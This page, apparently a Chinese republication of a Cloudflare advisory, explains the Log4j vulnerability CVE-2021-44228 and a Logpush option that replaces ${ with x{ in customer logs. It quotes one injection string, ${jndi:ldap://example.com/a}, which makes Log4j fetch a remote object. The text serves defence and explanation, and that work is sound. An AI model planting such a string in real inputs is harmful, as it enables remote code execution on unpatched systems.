TG客服:@SSjiejie — 官方频道:@SSwangluo
三生网络 © 2009-2023 超15年出海经验,跨境项目专家
2021年12月9日,CVE-2021-44228这种零日漏洞利用在全球曝光。该漏洞会影响Apache Log4j实用工具。Cloudflare 立即更新了我们的WAF,以帮助防御该漏洞,但我们建议客户尽快更新其系统。
然而,我们了解许多Cloudflare客户通过使用Log4j的软件使用其日志,因此我们还缓解了通过Cloudflare日志的任何漏洞利用。截至本文发稿时,我们在发送给客户的日志中发现高达1000次/秒的漏洞利用模式。
客户可以立即开始更新其Logpush作业,以自动修改可能触发此漏洞的令牌。
攻击的工作方式
您可以阅读有关Log4j漏洞工作方式的更多信息。简而言之,攻击者可以在任何字符串中添加诸如${jndi:ldap://example.com/a} 之类的内容。Log4j会在互联网上建立连接以检索此对象。
Cloudflare日志包含由公共互联网上的最终用户控制的许多字符串字段,例如用户代理和 URL 路径。通过此漏洞,恶意用户有可能在读取这些字段并使用未修补的Log4j实例的任何系统上进行远程代码执行。
我们的缓解方案
遗憾的是,仅仅检查诸如${jndi:ldap之类的令牌不足以防御此漏洞。由于模板中使用强大的语言表达式,还有必要检查混淆的变体。我们已经发现攻击者在使用诸如 之类的真实用例变种。因此,修改令牌{ 是防御此漏洞的最常规方法。
令牌 ${ 在我们目前发送给客户的日志中出现的频率高达1,000次/秒。对一些记录进行抽查表明,该令牌的许多情况并不是企图利用此漏洞。因此我们无法安全地修改日志,而不影响可能预期在其日志中出现此令牌的客户。
从现在开始,客户可以更新其Logpush作业以修改所有地方的字符串 ${ 并将其替换为 x{。
为此,客户可以更新其Logpush作业选项配置以包括参数CVE-2021-44228=true。请注意,此选项目前在Cloudflare Dashboard 中不可用,仅可使用API进行修改。
TG客服:@SSjiejie — 官方频道:@SSwangluo
三生网络 © 2009-2023 超15年出海经验,跨境项目专家